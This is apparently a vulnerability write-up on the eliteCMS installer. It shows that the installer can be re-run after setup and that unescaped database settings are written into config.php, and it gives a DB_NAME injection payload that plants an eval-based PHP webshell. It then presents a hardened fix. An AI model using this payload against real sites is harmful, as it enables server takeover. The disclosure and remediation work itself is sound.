eliteCMS installer not locked after setup + one-liner webshell write vulnerability

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked once installation finishes, so an attacker can open the installer URL and run the installation again.

The second vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.

Let's look at the code (install step 4; the omitted parts are marked "..."):

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    // The config file is built as a string of PHP source
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // Session values are interpolated into the PHP source without any escaping
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // The string is then written to config.php
    $writer = fopen($file, 'w');
...

Now look at where the session values come from:

// POST values are copied straight into the session without validation
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.

If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
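The two problems above (an installer that can be re-run, and untrusted values spliced into PHP source) can be fixed in the same step-4 writer. The following is an added example written for this post, not eliteCMS code; the names INSTALL_LOCK, assert_not_installed(), validate_setting(), build_config() and write_config() are assumptions for the illustration. It emits every setting with var_export() so that the value always lands inside a quoted PHP string literal, refuses to run when a lock file exists, and creates that lock only after the config has been written.

```php
<?php
// Added example (not eliteCMS code): a hardened version of the installer's
// step-4 config writer. INSTALL_LOCK and the function names are assumptions.

declare(strict_types=1);

// Path of the generated config and of the lock file marking a completed install.
define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');
define('INSTALL_LOCK', __DIR__ . '/install.lock');

/**
 * Refuse to run the installer again once install.lock exists.
 * Addresses the first issue: the installer can be re-run after setup.
 */
function assert_not_installed(): void
{
    if (file_exists(INSTALL_LOCK)) {
        http_response_code(403);
        exit('Installation already completed. Remove install.lock to reinstall.');
    }
}

/**
 * Validate one DB setting: non-empty and free of control characters.
 * This is a sanity check only; the escaping done by var_export() below is
 * what makes the value safe to embed in PHP source.
 */
function validate_setting(string $name, string $value): string
{
    if ($value === '' || preg_match('/[\x00-\x1f\x7f]/', $value)) {
        throw new InvalidArgumentException("Invalid value for $name");
    }
    return $value;
}

/**
 * Build the config file body. var_export() produces a single-quoted PHP
 * string literal with quotes and backslashes escaped, so a value such as
 * "?><?php ... ?>" stays inside the string and is never parsed as code.
 * The generated file also carries no closing ?> tag.
 */
function build_config(array $settings): string
{
    $out = "<?php\n// Generated by the installer; do not edit by hand.\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $value = validate_setting($key, (string) ($settings[$key] ?? ''));
        $out .= sprintf("define(%s, %s);\n", var_export($key, true), var_export($value, true));
    }
    return $out;
}

/**
 * Write the config atomically and only then create the install lock.
 */
function write_config(array $settings): void
{
    assert_not_installed();
    $body = build_config($settings);
    // Temp file plus rename so a half-written config.php never exists.
    $tmp = CONFIG_FILE . '.tmp';
    if (file_put_contents($tmp, $body, LOCK_EX) === false || !rename($tmp, CONFIG_FILE)) {
        throw new RuntimeException('Could not write config file');
    }
    chmod(CONFIG_FILE, 0640);
    // Create the lock last, so a failed write leaves the installer usable.
    file_put_contents(INSTALL_LOCK, date('c') . "\n");
}

// Constructed sample input: the DB_NAME payload from the post above.
$sample = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 'secret',
];
echo build_config($sample);
```

Run from the command line, the sample prints a config whose DB_NAME line is `define('DB_NAME', '"?><?php eval($_POST[c]);?><?php');`, an ordinary string literal. In a real installer the lock check belongs at the top of install.php, before any step runs, so that even step 1 is unreachable once install.lock exists.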